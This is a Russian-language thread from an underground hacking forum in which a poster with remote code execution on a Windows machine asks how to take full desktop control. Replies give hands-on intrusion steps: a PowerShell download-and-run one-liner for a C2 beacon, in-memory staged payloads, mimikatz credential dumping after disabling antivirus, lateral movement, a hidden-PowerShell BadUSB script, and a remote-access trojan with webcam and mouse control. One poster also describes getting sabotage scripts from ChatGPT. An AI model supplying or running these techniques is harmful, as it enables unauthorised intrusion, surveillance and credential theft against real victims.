• XSS.stack #1 – первый литературный журнал от юзеров форума

RCE windows. А дальше что?

narow71

RAID-массив
Пользователь
Регистрация
16.07.2024
Сообщения
75
Решения
1
Реакции
34
Всем привет

Получил я значит rce в windows. То есть могу выполнять любые команды cmd с правами админа. Так вот. Как сделать так, чтобы можно было получить полный доступ к винде? Видеть рабочий стол, управлять мышкой.

ngrok не предлагать так как firewall может его заблокировать да и ключа нет

Если бы был открыт rdp я б создал юзера но рдп к сожалению не открыт

Есть какие нибудь идеи?
 
Друг,а ты пен-ом когда занялся? И для каких целей ты в этой игре? Ответь пожалуйста развёрнуто.
Не занимался. Поэтому и спрашиваю :)
 
Друг,а ты пен-ом когда занялся? И для каких целей ты в этой игре? Ответь пожалуйста развёрнуто.
Чего сразу на новичков кидаться, админ скозал форум для того чтобы таким помогать

Всем привет

Получил я значит rce в windows. То есть могу выполнять любые команды cmd с правами админа. Так вот. Как сделать так, чтобы можно было получить полный доступ к винде? Видеть рабочий стол, управлять мышкой.

ngrok не предлагать так как firewall может его заблокировать да и ключа нет

Если бы был открыт rdp я б создал юзера но рдп к сожалению не открыт

Есть какие нибудь идеи?
Дальше скачиваешь себе какой нибудь C2 фреймворк, генерируешь допустим test.exe маяк, криптуешь его, хостишь где нибудь допустим на http://192.168.1.1/test.exe , и выполняешь на атакуемой машине в cmd
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/test.exe', '%TEMP%\test.exe'); Start-Process '%TEMP%\test.exe'"
И в интерфейсе C2 фреймворка уже есть удобные кнопочки, и hvnc, и браузер файлов, и готовые тулзы
 
Чего сразу на новичков кидаться, админ скозал форум для того чтобы таким помогать


Дальше скачиваешь себе какой нибудь C2 фреймворк, генерируешь допустим test.exe маяк, криптуешь его, хостишь где нибудь допустим на http://192.168.1.1/test.exe , и выполняешь на атакуемой машине в cmd
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/test.exe', '%TEMP%\test.exe'); Start-Process '%TEMP%\test.exe'"
И в интерфейсе C2 фреймворка уже есть удобные кнопочки, и hvnc, и браузер файлов, и готовые тулзы
Спасибо! А я так понимаю крипт покупать надо?
 
Спасибо! А я так понимаю крипт покупать надо?
Это пример был для теста на своей виртуалке без АВ, крипт не обязателен (cmd команда скачивает твой test.exe во временную директорию %temp% и запускает, этот новый файл сразу сканирует АВ и без крипта он его моментально удалит, или остановит рантайм).
В реальных атаках диск вообще не трогают, а загружают и выполняют в ram допустим зашифрованную в картинках (или любом другом контенте) пейлоад с доверенных доменов (например с https://filestore.community.support...leimages/864bafb6-3179-432e-877a-b48137f57c04 ), обычно в несколько стадий rce > stage loader > second stage > эксплуатация
 
ТС, это теоретически - гипотетический вопрос или RCE сам нашел? Если сам, то хватит ума и для дальнейшего.
 
ТС, это теоретически - гипотетический вопрос или RCE сам нашел? Если сам, то хватит ума и для дальнейшего.
Конечно он нашел зеродей и спрашивает как скачать и запустить exe
 
Всем привет

Получил я значит rce в windows. То есть могу выполнять любые команды cmd с правами админа. Так вот. Как сделать так, чтобы можно было получить полный доступ к винде? Видеть рабочий стол, управлять мышкой.

ngrok не предлагать так как firewall может его заблокировать да и ключа нет

Если бы был открыт rdp я б создал юзера но рдп к сожалению не открыт

Есть какие нибудь идеи?
прокинь рдп порт через ssh
 
ТС, это теоретически - гипотетический вопрос или RCE сам нашел? Если сам, то хватит ума и для дальнейшего.
Это паблик cve которая приводит к rce на ос
 
лучше в appdata т.к temp чистиется
Чего сразу на новичков кидаться, админ скозал форум для того чтобы таким помогать


Дальше скачиваешь себе какой нибудь C2 фреймворк, генерируешь допустим test.exe маяк, криптуешь его, хостишь где нибудь допустим на http://192.168.1.1/test.exe , и выполняешь на атакуемой машине в cmd
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/test.exe', '%TEMP%\test.exe'); Start-Process '%TEMP%\test.exe'"
И в интерфейсе C2 фреймворка уже есть удобные кнопочки, и hvnc, и браузер файлов, и готовые тулзы
 
лучше в appdata т.к temp чистиется
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 
Есть какие нибудь идеи?
Я бы посоветовал после RCE поднять привилегии, тогда у тебя будет больше возможностей для выполнения дальнейших действий.
Если рассматривать цепочку с использованием C2, то можешь в свой скрипт для RCE вставить маяк. К примеру если будешь использовать кобальт, то после запуска маяка на целевой тачке у тебя она будет доступна для дальнейшего управления, можешь выкачивать файлы, делать закрепление. Про управление рабочим столом через C2 не подскажу, не пользовался не когда, но есть техника ShadowRDP, с ее помощью можно наблюдать и управлять целевой тачкой, но для нее нужно выполнить повышение привилегий.
 
Всем привет

Получил я значит rce в windows. То есть могу выполнять любые команды cmd с правами админа. Так вот. Как сделать так, чтобы можно было получить полный доступ к винде? Видеть рабочий стол, управлять мышкой.

ngrok не предлагать так как firewall может его заблокировать да и ключа нет

Если бы был открыт rdp я б создал юзера но рдп к сожалению не открыт

Есть какие нибудь идеи?
Видел, что тебе уже помогли про маяки и закреп, однако никто не сказал про хеши, с помощью которых ты можешь устроить горизонтальное перемещение по сети. Можно использовать мимик(aka mimikatz), однако сначала отключи антивирус или добавь в исключения .exe. Можно подгрузить мимик в памяти. Вот статья(вроде тут как раз про это, не помню уже): https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html
 
Видел, что тебе уже помогли про маяки и закреп, однако никто не сказал про хеши, с помощью которых ты можешь устроить горизонтальное перемещение по сети. Можно использовать мимик(aka mimikatz), однако сначала отключи антивирус или добавь в исключения .exe. Можно подгрузить мимик в памяти. Вот статья(вроде тут как раз про это, не помню уже): https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html
хорошая вставка! боковое перемещение вообще интересная тема, благодаря которой можно подняться по сети до главного админа
 
Я бы на твоём месте взял устройство Digispark за 2$ или CJMCU-Vurtual-BadUSB (с флешкой) через ардуино залил скрипт с гита для ducky или сразу для digispark, или в chatgpt спросил скрипт powershell для отключения firewall или открытия порта (внести правило в брандмауэр) на гите всё есть. Вообще я всегда болтаю с chatgpt как калькулятор удалить через powershell или ещё что-нибудь пакостное сделать для офисного планктона, а потом приходить на помощь за не лишние 10$ (хи-хи-хи) Вставишь куда надо имитацию клавы пока "тело" покинуло свой PC)

Открыть скрытно powershell)
DELAY 1000
GUI r
DELAY 100
REM Run a hidden powershell
STRING powershell -windowstyle hidden
ENTER
REM make sure powershell is open by waiting for 1 second.
DELAY 1000
(конвертируешь https://nixu-corp.github.io/ выбираешь digispark)

Далее XENO_RAT тебе в помощь создаёшь ратник для директории Appdata, заливаешь ####.exe на анонимный хостинг на 1 день вроде потом rat проверят и удалят "paste.c-net.org" (сам поищи альтернативу) Криптовать ратник не умею к сожалению, и вообще можно ли? но общую идею ты понял. Digispark работает и с переключением клавиатуры на английскую раскладку чтобы скрипт прописался, чтобы последовательно и с паузами всё прописывалось то бери badusb c флешкой CJMCU-Vurtual-BadUSB у digispark ограничение с памятью (можно 2 или 3 шт прикупить). А того лучше и вообще nethunter накатить на какой-нибудь Redmi Note 7 c использованием DuckHunter HID под видом зарядки телефона

(инфа про смену языка почитай)
Смена языка. Переключая языки и последовательно вводя одни и те же команды методом простого перебора раскладок клавиатуры.

void switchLang() {

Keyboard.press(KEY_LEFT_SHIFT);

Keyboard.press(KEY_LEFT_ALT);

delay(100);

Keyboard.releaseAll();

Keyboard.press(KEY_LEFT_SHIFT);

Keyboard.press(KEY_LEFT_CTRL);

delay(100);

Keyboard.releaseAll();

}
(digispark)

В xeno_rat будешь и мышкой управлять и комп перезагружать, за рабочим столом наблюдать, камера ноута - пожалуйста - к твои услугам. Ну стандарт функций как в старом APP - NjRat 0.7D Moded или Quasar.v1.4.1
Для загрузки своего RAT.exe глянь сюда BadUsb-Collection/Windows_Badusb/Execution/ DownloadAnyEXE.txt конвернёшь
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх